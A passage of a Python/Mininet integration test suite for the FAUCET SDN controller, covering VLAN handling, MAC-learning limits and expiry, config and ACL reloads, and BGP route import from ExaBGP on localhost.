self.flap_all_switch_ports()
self.ping_all_when_learned()
self.verify_broadcast()
self.verify_no_bcast_to_self()
class FaucetTaggedAndUntaggedSameVlanEgressTest(FaucetTaggedAndUntaggedSameVlanTest):
REQUIRES_METADATA = True
CONFIG = """
egress_pipeline: True
interfaces:
%(port_1)d:
tagged_vlans: [100]
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
class FaucetTaggedAndUntaggedSameVlanGroupTest(FaucetTaggedAndUntaggedSameVlanTest):
CONFIG = """
group_table: True
interfaces:
%(port_1)d:
tagged_vlans: [100]
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
class FaucetUntaggedMaxHostsTest(FaucetUntaggedTest):
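    """Test that the VLAN max_hosts limit caps learning and increments learn ban counters."""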
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
max_hosts: 2
"""
CONFIG = CONFIG_BOILER_UNTAGGED
def test_untagged(self):
self.ping_all()
learned_hosts = [
host for host in self.hosts_name_ordered() if self.host_learned(host)]
self.assertEqual(2, len(learned_hosts))
self.assertEqual(2, self.scrape_prometheus_var(
'vlan_hosts_learned', {'vlan': '100'}))
self.assertGreater(
self.scrape_prometheus_var(
'vlan_learn_bans', {'vlan': '100'}), 0)
class FaucetMaxHostsPortTest(FaucetUntaggedTest):
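    """Test that the per-port max_hosts limit caps learning on that port."""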
MAX_HOSTS = 3
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
max_hosts: 3
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
self.ping_all_when_learned()
for i in range(10, 10 + (self.MAX_HOSTS * 2)):
mac_intf = 'mac%u' % i
mac_ipv4 = '10.0.0.%u' % i
self.add_macvlan(second_host, mac_intf, ipa=mac_ipv4)
ping_cmd = mininet_test_util.timeout_cmd(
'fping %s -c1 -t1 -I%s %s > /dev/null 2> /dev/null' % (
self.FPING_ARGS_SHORT, mac_intf, first_host.IP()),
2)
second_host.cmd(ping_cmd)
flows = self.get_matching_flows_on_dpid(
self.dpid,
{'dl_vlan': '100', 'in_port': int(self.port_map['port_2'])},
table_id=self._ETH_SRC_TABLE)
self.assertEqual(self.MAX_HOSTS, len(flows))
port_labels = self.port_labels(self.port_map['port_2'])
self.assertGreater(
self.scrape_prometheus_var(
'port_learn_bans', port_labels), 0)
learned_macs = [
mac for _, mac in self.scrape_prometheus_var(
'learned_macs', dict(port_labels, vlan=100),
multiple=True) if mac]
self.assertEqual(self.MAX_HOSTS, len(learned_macs))
class FaucetSingleHostsTimeoutPrometheusTest(FaucetUntaggedTest):
"""Test that hosts learned and reported in Prometheus, time out."""
TIMEOUT = 15
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
timeout: 25
arp_neighbor_timeout: 12
nd_neighbor_timeout: 12
ignore_learn_ins: 0
learn_jitter: 0
cache_update_guard_time: 1
""" + CONFIG_BOILER_UNTAGGED
def hosts_learned(self, hosts):
"""Check that hosts are learned by FAUCET on the expected ports."""
macs_learned = []
for mac, port in hosts.items():
if self.prom_mac_learned(mac, port=port):
self.mac_learned(mac, in_port=port)
macs_learned.append(mac)
return macs_learned
def verify_hosts_learned(self, first_host, second_host, mac_ips, hosts):
mac_ipv4s = [mac_ipv4 for mac_ipv4, _ in mac_ips]
fping_cmd = mininet_test_util.timeout_cmd(
'fping %s -c%u %s' % (
self.FPING_ARGS_SHORT, int(self.TIMEOUT / 3), ' '.join(mac_ipv4s)),
self.TIMEOUT / 2)
for _ in range(3):
fping_out = first_host.cmd(fping_cmd)
self.assertTrue(fping_out, msg='fping did not complete: %s' % fping_cmd)
macs_learned = self.hosts_learned(hosts)
if len(macs_learned) == len(hosts):
return
time.sleep(1)
first_host_diag = first_host.cmd('ifconfig -a ; arp -an')
second_host_diag = second_host.cmd('ifconfig -a ; arp -an')
self.fail('%s cannot be learned (%s != %s)\nfirst host %s\nsecond host %s\n' % (
mac_ips, macs_learned, fping_out, first_host_diag, second_host_diag))
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
all_learned_mac_ports = {}
# learn batches of hosts, then down them
for base in (10, 20, 30):
def add_macvlans(base, count):
mac_intfs = []
mac_ips = []
learned_mac_ports = {}
for i in range(base, base + count):
mac_intf = 'mac%u' % i
mac_intfs.append(mac_intf)
mac_ipv4 = '10.0.0.%u' % i
self.add_macvlan(second_host, mac_intf, ipa=mac_ipv4)
macvlan_mac = self.get_mac_of_intf(mac_intf, second_host)
learned_mac_ports[macvlan_mac] = self.port_map['port_2']
mac_ips.append((mac_ipv4, macvlan_mac))
return (mac_intfs, mac_ips, learned_mac_ports)
def down_macvlans(macvlans):
for macvlan in macvlans:
second_host.cmd('ip link set dev %s down' % macvlan)
def learn_then_down_hosts(base, count):
mac_intfs, mac_ips, learned_mac_ports = add_macvlans(base, count)
self.verify_hosts_learned(first_host, second_host, mac_ips, learned_mac_ports)
down_macvlans(mac_intfs)
return learned_mac_ports
learned_mac_ports = learn_then_down_hosts(base, 5)
all_learned_mac_ports.update(learned_mac_ports)
# make sure at least one host still learned
learned_macs = self.hosts_learned(all_learned_mac_ports)
self.assertTrue(learned_macs)
before_expiry_learned_macs = learned_macs
# make sure they all eventually expire
for _ in range(self.TIMEOUT * 3):
learned_macs = self.hosts_learned(all_learned_mac_ports)
self.verify_learn_counters(
100, list(range(1, len(self.hosts_name_ordered()) + 1)))
if not learned_macs:
break
time.sleep(1)
self.assertFalse(learned_macs, msg='MACs did not expire: %s' % learned_macs)
self.assertTrue(before_expiry_learned_macs)
for mac in before_expiry_learned_macs:
self.wait_until_no_matching_flow({'eth_dst': mac}, table_id=self._ETH_DST_TABLE)
class FaucetSingleHostsNoIdleTimeoutPrometheusTest(FaucetSingleHostsTimeoutPrometheusTest):
"""Test broken reset idle timer on flow refresh workaround."""
CONFIG = """
timeout: 15
arp_neighbor_timeout: 4
nd_neighbor_timeout: 4
ignore_learn_ins: 0
learn_jitter: 0
cache_update_guard_time: 1
idle_dst: False
""" + CONFIG_BOILER_UNTAGGED
class FaucetSingleL3LearnMACsOnPortTest(FaucetUntaggedTest):
    # TODO: currently set low to accommodate the least capable hardware
def _max_hosts(): # pylint: disable=no-method-argument,no-self-use
return 512
MAX_HOSTS = _max_hosts()
TEST_IPV4_NET = '10.0.0.0'
TEST_IPV4_PREFIX = 16 # must hold more than MAX_HOSTS + 4
LEARN_IPV4 = '10.0.254.254'
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
max_hosts: %u
faucet_vips: ["10.0.254.254/16"]
""" % (_max_hosts() + 4)
CONFIG = ("""
ignore_learn_ins: 0
metrics_rate_limit_sec: 3
table_sizes:
eth_src: %u
eth_dst: %u
ipv4_fib: %u
""" % (_max_hosts() + 64, _max_hosts() + 64, _max_hosts() + 64) + """
interfaces:
%(port_1)d:
native_vlan: 100
max_hosts: 4096
%(port_2)d:
native_vlan: 100
max_hosts: 4096
%(port_3)d:
native_vlan: 100
max_hosts: 4096
%(port_4)d:
native_vlan: 100
max_hosts: 4096
""")
def test_untagged(self):
test_net = ipaddress.IPv4Network(
'%s/%s' % (self.TEST_IPV4_NET, self.TEST_IPV4_PREFIX))
learn_ip = ipaddress.IPv4Address(self.LEARN_IPV4)
self.verify_learning(test_net, learn_ip, 64, self.MAX_HOSTS)
class FaucetSingleL2LearnMACsOnPortTest(FaucetUntaggedTest):
    # TODO: currently set low to accommodate the least capable hardware
def _max_hosts(): # pylint: disable=no-method-argument,no-self-use
return 1024
MAX_HOSTS = _max_hosts()
TEST_IPV4_NET = '10.0.0.0'
TEST_IPV4_PREFIX = 16 # must hold more than MAX_HOSTS + 4
LEARN_IPV4 = '10.0.0.1'
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
max_hosts: %u
""" % (_max_hosts() + 4)
CONFIG = ("""
ignore_learn_ins: 0
metrics_rate_limit_sec: 3
table_sizes:
eth_src: %u
eth_dst: %u
""" % (_max_hosts() + 64, _max_hosts() + 64) + """
interfaces:
%(port_1)d:
native_vlan: 100
max_hosts: 4096
%(port_2)d:
native_vlan: 100
max_hosts: 4096
%(port_3)d:
native_vlan: 100
max_hosts: 4096
%(port_4)d:
native_vlan: 100
max_hosts: 4096
""")
def test_untagged(self):
test_net = ipaddress.IPv4Network(
'%s/%s' % (self.TEST_IPV4_NET, self.TEST_IPV4_PREFIX))
learn_ip = ipaddress.IPv4Address(self.LEARN_IPV4)
self.verify_learning(test_net, learn_ip, 64, self.MAX_HOSTS)
class FaucetUntaggedHUPTest(FaucetUntaggedTest):
"""Test handling HUP signal without config change."""
def _configure_count_with_retry(self, expected_count):
expected = [expected_count for _ in range(self.NUM_FAUCET_CONTROLLERS)]
counts = []
for _ in range(3):
counts = []
for controller in self.faucet_controllers:
count = self.get_configure_count(controller=controller.name)
counts.append(count)
if counts == expected:
break
time.sleep(1)
self.assertEqual(
counts, expected,
'Controller configure counts %s != expected counts %s' % (counts, expected))
def test_untagged(self):
"""Test that FAUCET receives HUP signal and keeps switching."""
init_config_count = self.get_configure_count()
reload_type_vars = (
'faucet_config_reload_cold',
'faucet_config_reload_warm')
reload_vals = {}
for var in reload_type_vars:
reload_vals[var] = self.scrape_prometheus_var(
var, dpid=True, default=None)
for i in range(init_config_count, init_config_count + 3):
self._configure_count_with_retry(i)
with open(self.faucet_config_path, 'a') as config_file:
config_file.write('\n')
self.verify_faucet_reconf(change_expected=False)
self._configure_count_with_retry(i + 1)
self.assertEqual(
self.scrape_prometheus_var(
'of_dp_disconnections_total', dpid=True, default=None),
0)
self.assertEqual(
self.scrape_prometheus_var(
'of_dp_connections_total', dpid=True, default=None),
1)
self.wait_until_controller_flow()
self.ping_all_when_learned()
for var in reload_type_vars:
self.assertEqual(
reload_vals[var],
self.scrape_prometheus_var(var, dpid=True, default=None))
class FaucetIPv4TupleTest(FaucetTest):
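    """Test reloading ACLs with an increasing number of exact-match IPv4 5-tuple rules."""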
MAX_RULES = 1024
ETH_TYPE = IPV4_ETH
NET_BASE = ipaddress.IPv4Network('10.0.0.0/16')
N_UNTAGGED = 4
N_TAGGED = 0
LINKS_PER_HOST = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
table_sizes:
port_acl: 1100
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
"""
START_ACL_CONFIG = """
acls:
1:
exact_match: True
rules:
- rule:
actions: {allow: 1}
eth_type: 2048
ip_proto: 6
ipv4_dst: 127.0.0.1
ipv4_src: 127.0.0.1
tcp_dst: 65535
tcp_src: 65535
"""
def setUp(self):
super().setUp()
self.acl_config_file = os.path.join(self.tmpdir, 'acl.txt')
self.CONFIG = '\n'.join(
(self.CONFIG, 'include:\n - %s' % self.acl_config_file))
with open(self.acl_config_file, 'w') as acf:
acf.write(self.START_ACL_CONFIG)
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid)
self.start_net()
def _push_tuples(self, eth_type, host_ips):
max_rules = len(host_ips)
rules = 1
while rules <= max_rules:
rules_yaml = []
for rule in range(rules):
host_ip = host_ips[rule]
port = (rule + 1) % 2**16
ip_match = str(host_ip)
rule_yaml = {
'eth_type': eth_type,
'ip_proto': 6,
'tcp_src': port,
'tcp_dst': port,
'ipv%u_src' % host_ip.version: ip_match,
'ipv%u_dst' % host_ip.version: ip_match,
'actions': {'allow': 1},
}
rules_yaml.append({'rule': rule_yaml})
yaml_acl_conf = {'acls': {1: {'exact_match': True, 'rules': rules_yaml}}}
tuple_txt = '%u IPv%u tuples\n' % (len(rules_yaml), host_ip.version)
error('pushing %s' % tuple_txt)
self.reload_conf(
yaml_acl_conf, self.acl_config_file, # pytype: disable=attribute-error
restart=True, cold_start=False)
error('pushed %s' % tuple_txt)
self.wait_until_matching_flow(
{'tp_src': port, 'ip_proto': 6, 'dl_type': eth_type}, table_id=0)
rules *= 2
def test_tuples(self):
host_ips = list(itertools.islice(self.NET_BASE.hosts(), self.MAX_RULES))
self._push_tuples(self.ETH_TYPE, host_ips)
class FaucetIPv6TupleTest(FaucetIPv4TupleTest):
MAX_RULES = 1024
ETH_TYPE = IPV6_ETH
NET_BASE = ipaddress.IPv6Network('fc00::00/64')
START_ACL_CONFIG = """
acls:
1:
exact_match: True
rules:
- rule:
actions: {allow: 1}
eth_type: 34525
ip_proto: 6
ipv6_dst: ::1
ipv6_src: ::1
tcp_dst: 65535
tcp_src: 65535
"""
class FaucetConfigReloadTestBase(FaucetTest):
"""Test handling HUP signal with config change."""
N_UNTAGGED = 4
N_TAGGED = 0
LINKS_PER_HOST = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
200:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: allow
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
tagged_vlans: [200]
"""
ACL = """
acls:
1:
- rule:
description: "rule 1"
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
cookie: COOKIE
actions:
allow: 1
2:
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 1
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 0
- rule:
cookie: COOKIE
actions:
allow: 1
3:
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5003
actions:
allow: 0
4:
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
deny:
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 65535
actions:
allow: 0
- rule:
cookie: COOKIE
actions:
allow: 0
allow:
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 65535
actions:
allow: 1
- rule:
cookie: COOKIE
actions:
allow: 1
"""
ACL_COOKIE = None
def setUp(self):
super().setUp()
self.ACL_COOKIE = random.randint(1, 2**16 - 1)
self.ACL = self.ACL.replace('COOKIE', str(self.ACL_COOKIE))
self.acl_config_file = '%s/acl.yaml' % self.tmpdir
with open(self.acl_config_file, 'w') as config_file:
config_file.write(self.ACL)
self.CONFIG = '\n'.join(
(self.CONFIG, 'include:\n - %s' % self.acl_config_file))
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid)
self.start_net()
class FaucetDelPortTest(FaucetConfigReloadTestBase):
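    """Test that a learned host's flows are removed when its port is deconfigured."""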
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
200:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: allow
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 200
"""
def test_port_down_flow_gone(self):
last_host = self.hosts_name_ordered()[-1]
self.require_host_learned(last_host)
second_host_dst_match = {'eth_dst': last_host.MAC()}
self.wait_until_matching_flow(
second_host_dst_match, table_id=self._ETH_DST_TABLE)
self.change_port_config(
self.port_map['port_4'], None, None,
restart=True, cold_start=None)
self.wait_until_no_matching_flow(
second_host_dst_match, table_id=self._ETH_DST_TABLE)
class FaucetConfigReloadTest(FaucetConfigReloadTestBase):
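    """Test config reloads: adding an unknown DP, rejecting bad config, and changing port VLAN/ACL/permanent_learn settings."""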
def test_add_unknown_dp(self):
conf = self._get_faucet_conf()
conf['dps']['unknown'] = {
'dp_id': int(self.rand_dpid()),
'hardware': 'Open vSwitch',
}
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=False, change_expected=False)
def test_tabs_are_bad(self):
self._enable_event_log()
self.ping_all_when_learned()
self.assertEqual(0, self.scrape_prometheus_var('faucet_config_load_error', dpid=False))
event = self._wait_until_matching_event(lambda event: event['CONFIG_CHANGE']['success'])
good_config_hash_info = event['CONFIG_CHANGE']['config_hash_info']
self.assertNotEqual('', good_config_hash_info['hashes'])
orig_conf = self._get_faucet_conf()
self.force_faucet_reload(
'\t'.join(('tabs', 'are', 'bad')))
self.assertEqual(1, self.scrape_prometheus_var('faucet_config_load_error', dpid=False))
event = self._wait_until_matching_event(lambda event: not event['CONFIG_CHANGE']['success'])
self.assertEqual('', event['CONFIG_CHANGE']['config_hash_info']['hashes'])
self.ping_all_when_learned()
self.reload_conf(
orig_conf, self.faucet_config_path,
restart=True, cold_start=False, change_expected=False)
self.assertEqual(0, self.scrape_prometheus_var('faucet_config_load_error', dpid=False))
event = self._wait_until_matching_event(lambda event: event['CONFIG_CHANGE']['success'])
self.assertEqual(good_config_hash_info, event['CONFIG_CHANGE']['config_hash_info'])
def test_port_change_vlan(self):
first_host, second_host = self.hosts_name_ordered()[:2]
third_host, fourth_host = self.hosts_name_ordered()[2:]
self.ping_all_when_learned()
self.change_port_config(
self.port_map['port_1'], 'native_vlan', 200,
restart=False, cold_start=False)
self.wait_until_matching_flow(
{'vlan_vid': 200}, table_id=self._ETH_SRC_TABLE,
actions=['OUTPUT:CONTROLLER', 'GOTO_TABLE:%u' % self._ETH_DST_TABLE])
self.change_port_config(
self.port_map['port_2'], 'native_vlan', 200,
restart=True, cold_start=False)
for port_name in ('port_1', 'port_2'):
self.wait_until_matching_flow(
{'in_port': int(self.port_map[port_name])},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:4296}'])
self.one_ipv4_ping(first_host, second_host.IP(), require_host_learned=False)
# hosts 1 and 2 now in VLAN 200, so they shouldn't see floods for 3 and 4.
self.verify_vlan_flood_limited(
third_host, fourth_host, first_host)
def test_port_change_acl(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
orig_conf = self._get_faucet_conf()
self.change_port_config(
self.port_map['port_1'], 'acl_in', 1,
cold_start=False)
self.wait_until_matching_flow(
{'in_port': int(self.port_map['port_1']),
'eth_type': IPV4_ETH, 'tcp_dst': 5001, 'ip_proto': 6},
table_id=self._PORT_ACL_TABLE, cookie=self.ACL_COOKIE)
self.wait_until_matching_flow(
{'vlan_vid': 100}, table_id=self._ETH_SRC_TABLE,
actions=['OUTPUT:CONTROLLER', 'GOTO_TABLE:%u' % self._ETH_DST_TABLE])
self.verify_tp_dst_blocked(5001, first_host, second_host)
self.verify_tp_dst_notblocked(5002, first_host, second_host)
self.reload_conf(
orig_conf, self.faucet_config_path,
restart=True, cold_start=False, host_cache=100)
self.verify_tp_dst_notblocked(
5001, first_host, second_host, table_id=None)
self.verify_tp_dst_notblocked(
5002, first_host, second_host, table_id=None)
def test_port_change_perm_learn(self):
first_host, second_host, third_host = self.hosts_name_ordered()[0:3]
self.change_port_config(
self.port_map['port_1'], 'permanent_learn', True,
restart=True, cold_start=False)
self.ping_all_when_learned(hard_timeout=0)
original_third_host_mac = third_host.MAC()
third_host.setMAC(first_host.MAC())
self.assertEqual(100.0, self.ping((second_host, third_host)))
self.retry_net_ping(hosts=(first_host, second_host))
third_host.setMAC(original_third_host_mac)
self.ping_all_when_learned(hard_timeout=0)
self.change_port_config(
self.port_map['port_1'], 'acl_in', 1,
restart=True, cold_start=False)
self.wait_until_matching_flow(
{'in_port': int(self.port_map['port_1']),
'eth_type': IPV4_ETH, 'tcp_dst': 5001, 'ip_proto': 6},
table_id=self._PORT_ACL_TABLE)
self.verify_tp_dst_blocked(5001, first_host, second_host)
self.verify_tp_dst_notblocked(5002, first_host, second_host)
class FaucetDeleteConfigReloadTest(FaucetConfigReloadTestBase):
def test_delete_interface(self):
# With all ports changed, we should cold start.
conf = self._get_faucet_conf()
del conf['dps'][self.DP_NAME]['interfaces']
conf['dps'][self.DP_NAME]['interfaces'] = {
int(self.port_map['port_1']): {
'native_vlan': 100,
'tagged_vlans': [200],
}
}
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=True, change_expected=True)
class FaucetRouterConfigReloadTest(FaucetConfigReloadTestBase):
def test_router_config_reload(self):
conf = self._get_faucet_conf()
conf['routers'] = {
'router-1': {
'vlans': [100, 200],
}
}
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=True, change_expected=True)
class FaucetConfigReloadAclTest(FaucetConfigReloadTestBase):
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acls_in: [allow]
%(port_2)d:
native_vlan: 100
acl_in: allow
%(port_3)d:
native_vlan: 100
acl_in: deny
%(port_4)d:
native_vlan: 100
acl_in: deny
"""
def _verify_hosts_learned(self, hosts):
self.ping_all()
for host in hosts:
self.require_host_learned(host)
self.assertEqual(len(hosts), self.scrape_prometheus_var(
'vlan_hosts_learned', {'vlan': '100'}))
def test_port_acls(self):
hup = not self.STAT_RELOAD
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
self._verify_hosts_learned((first_host, second_host))
self.change_port_config(
self.port_map['port_3'], 'acl_in', 'allow',
restart=True, cold_start=False, hup=hup)
self.change_port_config(
self.port_map['port_1'], 'acls_in', [3, 4, 'allow'],
restart=True, cold_start=False, hup=hup)
self.coldstart_conf(hup=hup)
self._verify_hosts_learned((first_host, second_host, third_host))
self.verify_tp_dst_blocked(5001, first_host, second_host)
self.verify_tp_dst_notblocked(5002, first_host, second_host)
self.verify_tp_dst_blocked(5003, first_host, second_host)
class FaucetConfigReloadMACFlushTest(FaucetConfigReloadTestBase):
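    """Test that learned MACs are flushed when a port's native VLAN is changed."""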
def test_port_change_vlan(self):
self.ping_all_when_learned()
self.assertEqual(4, len(self.scrape_prometheus(var='learned_l2_port')))
self.change_port_config(
self.port_map['port_1'], 'native_vlan', 200,
restart=False, cold_start=False)
self.wait_until_matching_flow(
{'vlan_vid': 200}, table_id=self._ETH_SRC_TABLE,
actions=['OUTPUT:CONTROLLER', 'GOTO_TABLE:%u' % self._ETH_DST_TABLE])
self.change_port_config(
self.port_map['port_2'], 'native_vlan', 200,
restart=True, cold_start=False)
for port_name in ('port_1', 'port_2'):
self.wait_until_matching_flow(
{'in_port': int(self.port_map[port_name])},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:4296}'])
self.assertEqual(0, len(self.scrape_prometheus(var='learned_l2_port')))
class FaucetConfigReloadEmptyAclTest(FaucetConfigReloadTestBase):
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 300
%(port_4)d:
native_vlan: 100
"""
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
200:
description: "untagged"
300:
description: "untagged"
acls_in: [1]
"""
STAT_RELOAD = '1'
def test_port_acls(self):
hup = not self.STAT_RELOAD
self.change_port_config(
self.port_map['port_3'], 'acls_in', [],
restart=True, cold_start=False, hup=hup, change_expected=False)
self.change_port_config(
self.port_map['port_1'], 'acls_in', [],
restart=True, cold_start=False, hup=hup, change_expected=False)
class FaucetConfigStatReloadAclTest(FaucetConfigReloadAclTest):
# Use the stat-based reload method.
STAT_RELOAD = '1'
class FaucetUntaggedBGPDualstackDefaultRouteTest(FaucetUntaggedTest):
"""Test IPv4 routing and import default route from BGP."""
NUM_FAUCET_CONTROLLERS = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24", "fc00::1:254/112"]
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["127.0.0.1", "::1"]
neighbor_addresses: ["127.0.0.1", "::1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_peer_conf = """
static {
route 0.0.0.0/0 next-hop 10.0.0.1 local-preference 100;
}
"""
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def post_start_net(self):
exabgp_conf = self.get_exabgp_conf(
mininet_test_util.LOCALHOST, self.exabgp_peer_conf)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
"""Test IPv4 routing, and BGP routes received."""
self.assertEqual(self.NUM_FAUCET_CONTROLLERS, 1)
first_host, second_host = self.hosts_name_ordered()[:2]
first_host_alias_ip = ipaddress.ip_interface('10.99.99.99/24')
first_host_alias_host_ip = ipaddress.ip_interface(
ipaddress.ip_network(first_host_alias_ip.ip))
self.host_ipv4_alias(first_host, first_host_alias_ip)
self.wait_bgp_up(
mininet_test_util.LOCALHOST, 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '4', 'vlan': '100'}, default=0),
0)
self.wait_exabgp_sent_updates(self.exabgp_log)
self.add_host_route(
second_host, first_host_alias_host_ip, self.FAUCET_VIPV4.ip)
for _ in range(2):
self.one_ipv4_ping(second_host, first_host_alias_ip.ip)
self.one_ipv4_controller_ping(first_host)
self.coldstart_conf()
class FaucetUntaggedBGPIPv4DefaultRouteTest(FaucetUntaggedTest):
"""Test IPv4 routing and import default route from BGP."""
NUM_FAUCET_CONTROLLERS = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24"]
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["127.0.0.1"]
neighbor_addresses: ["127.0.0.1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_peer_conf = """
static {
route 0.0.0.0/0 next-hop 10.0.0.1 local-preference 100;
}
"""
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def post_start_net(self):
exabgp_conf = self.get_exabgp_conf(
mininet_test_util.LOCALHOST, self.exabgp_peer_conf)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
"""Test IPv4 routing, and BGP routes received."""
self.assertEqual(self.NUM_FAUCET_CONTROLLERS, 1)
first_host, second_host = self.hosts_name_ordered()[:2]
first_host_alias_ip = ipaddress.ip_interface('10.99.99.99/24')
first_host_alias_host_ip = ipaddress.ip_interface(
ipaddress.ip_network(first_host_alias_ip.ip))
self.host_ipv4_alias(first_host, first_host_alias_ip)
self.wait_bgp_up(
mininet_test_util.LOCALHOST, 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '4', 'vlan': '100'}, default=0),
0)
self.wait_exabgp_sent_updates(self.exabgp_log)
self.add_host_route(
second_host, first_host_alias_host_ip, self.FAUCET_VIPV4.ip)
self.one_ipv4_ping(second_host, first_host_alias_ip.ip)
self.one_ipv4_controller_ping(first_host)
self.coldstart_conf()
class FaucetUntaggedBGPIPv4RouteTest(FaucetUntaggedTest):
"""Test IPv4 routing and import from BGP."""
NUM_FAUCET_CONTROLLERS = 1
NUM_GAUGE_CONTROLLERS = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24"]
routes:
- route:
ip_dst: 10.99.99.0/24
ip_gw: 10.0.0.1
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["127.0.0.1"]
neighbor_addresses: ["127.0.0.1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_peer_conf = """
static {
route 10.0.1.0/24 next-hop 10.0.0.1 local-preference 100;
route 10.0.2.0/24 next-hop 10.0.0.2 local-preference 100;
route 10.0.3.0/24 next-hop 10.0.0.2 local-preference 100;
route 10.0.4.0/24 next-hop 10.0.0.254;
route 10.0.5.0/24 next-hop 10.10.0.1;
}
"""
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def post_start_net(self):
exabgp_conf = self.get_exabgp_conf(
mininet_test_util.LOCALHOST, self.exabgp_peer_conf)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
"""Test IPv4 routing, and BGP routes received."""
self.assertEqual(self.NUM_FAUCET_CONTROLLERS, 1)
first_host, second_host = self.hosts_name_ordered()[:2]
# wait until 10.0.0.1 has been resolved
self.wait_for_route_as_flow(
first_host.MAC(), ipaddress.IPv4Network('10.99.99.0/24'))
self.wait_bgp_up(
mininet_test_util.LOCALHOST, 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '4', 'vlan': '100'}),
0)
self.wait_exabgp_sent_updates(self.exabgp_log)
self.verify_invalid_bgp_route(r'.+10.0.4.0\/24.+cannot be us$')
self.verify_invalid_bgp_route(r'.+10.0.5.0\/24.+because nexthop not in VLAN.+')
self.wait_for_route_as_flow(
second_host.MAC(), ipaddress.IPv4Network('10.0.3.0/24'))
